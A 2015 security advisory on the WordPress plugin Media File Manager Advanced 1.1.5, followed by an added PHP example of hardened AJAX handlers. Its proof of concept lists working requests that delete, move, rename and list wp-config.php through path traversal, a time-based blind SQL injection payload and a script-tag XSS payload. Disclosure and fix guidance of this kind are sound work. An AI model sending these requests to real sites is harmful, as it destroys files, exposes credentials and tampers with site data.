
WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

14 May 2015. Reported by Evex. Type: packetstorm. Source: packetstormsecurity.com

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection allows unauthorized actions, including post manipulation, directory operations, and SQL injection. No fix available.

Code
`Description  
  
"media-file-manager-advanced" allows any authenticated user to execute  
administrator actions due to weak permission checking.  
An attacker can delete/update posts, create/remove/list directories,  
move/rename/delete files, and perform blind SQL injection and cross-site  
scripting.  
  
Homepage  
  
https://wordpress.org/plugins/media-file-manager-advanced/  
  
Affected Version  
  
<= 1.1.5  
  
Description  
  
Vulnerability Scope  
  
  
LFD,SQL,XSS,Site Ruining and Changing of Content.  
  
Authorization Required  
  
User  
  
Proof of Concept  
  
  
Post Delete  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete  
post: id=17  
  
MKDIR  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_mkdir  
newdir=EVEXFOLDER  
  
folder exists: http://domain.tld/wp-content/uploads/EVEXFOLDER  
  
RMDIR (Dir Must Be Empty)  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete_empty_dir  
dir=EVEXFOLDER&name=  
  
not found: http://domain.tld/wp-content/uploads/EVEXFOLDER  
  
UNLINK  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete  
dir=../../&name=wp-config.php  
  
no more wp-config.php  
  
Blind SQL INJECTION  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen  
id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)  
  
Sleeps for 10 seconds  
  
XSS  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen  
id="</button><script>alert(1)</script>  
  
Alerts(1)  
  
Update Post  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_update_media_information  
id=34&title=New_Title&caption=bla&description=Dummy Description  
  
Move Files  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_move  
dir_from=../../&items=wp-config.php&dir_to=  
  
now wp-config.php is in /wp-content/uploads/wp-config.php  
  
  
Renaming Files  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_rename  
dir=../../&from=wp-config.php&to=wp-config.txt  
  
now wp-config.php is renamed to wp-config.txt  
  
Directory Listing  
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_getdir  
dir=../../  
  
will list all files and directories  
  
Fix  
  
No Fix Available at The Moment.  
  
Time line  
  
Notified Vendor - No Reply  
Publish Disclosure  
`
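
The advisory attributes every issue to AJAX actions that any authenticated user can call with unvalidated `dir`, `name` and `id` parameters. The following is an added example, not the plugin's code and not part of the advisory, showing the checks such handlers need: a capability check plus nonce, containment of file paths under the uploads directory, a bound integer in the query, and escaped output. The handler names, the nonce action `mfma_example_nonce` and the capabilities chosen are assumptions made for illustration.

```php
<?php
// Added illustration, not the plugin's source. Handler names, the nonce action
// and the chosen capabilities are assumptions made for this example.
add_action( 'wp_ajax_mfma_example_delete', 'mfma_example_delete' );
add_action( 'wp_ajax_mfma_example_image_screen', 'mfma_example_image_screen' );

function mfma_example_guard( $capability ) {
    // wp_ajax_* hooks fire for every logged-in user, so each handler must
    // check a capability itself; the nonce ties the request to this user.
    if ( ! current_user_can( $capability ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'mfma_example_nonce', 'nonce' );
}

function mfma_example_delete() {
    mfma_example_guard( 'manage_options' );
    // Resolve the requested path and require it to stay inside the uploads
    // directory, so a value such as dir=../../ is rejected.
    $uploads = wp_upload_dir();
    $base    = realpath( $uploads['basedir'] );
    $dir     = isset( $_POST['dir'] ) ? wp_unslash( $_POST['dir'] ) : '';
    $name    = isset( $_POST['name'] ) ? sanitize_file_name( wp_unslash( $_POST['name'] ) ) : '';
    $target  = $base ? realpath( $base . '/' . $dir . '/' . $name ) : false;
    if ( ! $target || 0 !== strpos( $target, $base . DIRECTORY_SEPARATOR ) || ! is_file( $target ) ) {
        wp_send_json_error( 'invalid path', 400 );
    }
    wp_delete_file( $target );
    wp_send_json_success();
}

function mfma_example_image_screen() {
    mfma_example_guard( 'upload_files' );
    global $wpdb;
    // Cast the id to an integer and bind it as %d instead of concatenating it.
    $id  = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    $row = $wpdb->get_row( $wpdb->prepare(
        "SELECT ID, post_title FROM {$wpdb->posts} WHERE ID = %d AND post_type = 'attachment'",
        $id
    ) );
    if ( ! $row ) {
        wp_send_json_error( 'not found', 404 );
    }
    // Escape everything echoed into markup; the raw request value is never output.
    printf( '<button data-id="%d">%s</button>', (int) $row->ID, esc_html( $row->post_title ) );
    wp_die();
}
```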
